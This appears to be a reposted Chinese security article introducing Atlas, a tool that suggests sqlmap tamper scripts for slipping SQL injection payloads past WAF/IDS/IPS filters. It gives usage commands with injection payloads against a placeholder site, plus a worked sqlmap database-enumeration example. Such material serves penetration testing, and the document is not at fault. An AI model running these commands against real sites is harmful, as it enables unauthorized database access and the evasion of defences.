Atlas - Quick SQLMap Tamper Suggester v1.0

Atlas - Quick SQLMap Tamper Suggester v1.0
2023-1-4 09:22:13 Author: Ots安全(查看原文) 阅读量:34 收藏

Atlas是一个开源工具，可以建议 sqlmap 篡改绕过 WAF/IDS/IPS，该工具基于返回的状态码。

安装

$ git clone https://github.com/m4ll0k/Atlas.git atlas$ cd atlas$ python atlas.py # python3+

用法

atlas.py --url http://site.com/index.php?id=Price_ASC --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v

注入点（带%%inject%%）：

得到：

$ python atlas.py --url http://site.com/index/id/%%10%% --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v

邮政：

$ python atlas.py --url http://site.com/index/id/ -m POST -D 'test=%%10%%' --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v

标题：

$ python atlas.py --url http://site.com/index/id/ -H 'User-Agent: mozilla/5.0%%inject%%' -H 'X-header: test' --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v

篡改串联：

$ python atlas.py --url http://site.com/index/id/%%10%% --payload="-1234 AND 4321=4321-- AAAA" --concat "equaltolike,htmlencode" --random-agent -v

获取篡改列表：

$ python atlas.py -g

例子

运行 SQLMap：

$ python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3

Price_ASC') AND 8716=4837 AND ('yajr'='yajr被 WAF/IDS/IPS 拦截，现在尝试使用 Atlas：

$ python atlas.py --url 'http://site.com/index.php?id=Price_ASC' --payload="') AND 8716=4837 AND ('yajr'='yajr" --random-agent -v

在此刻：

$ python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3 --tamper=versionedkeywords,...

PS：缺失模块

安装模块：pip install humanfriendly

项目地址：https://github.com/m4ll0k/Atlas

文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247496348&idx=2&sn=77f9c2a44285e102c150e5d0d615e432&chksm=9badbbd7acda32c1066476c46a190b2ff779506c6126f65a626a83596e205f1e9e12b901b619#rd
如有侵权请联系:admin#unsafe.sh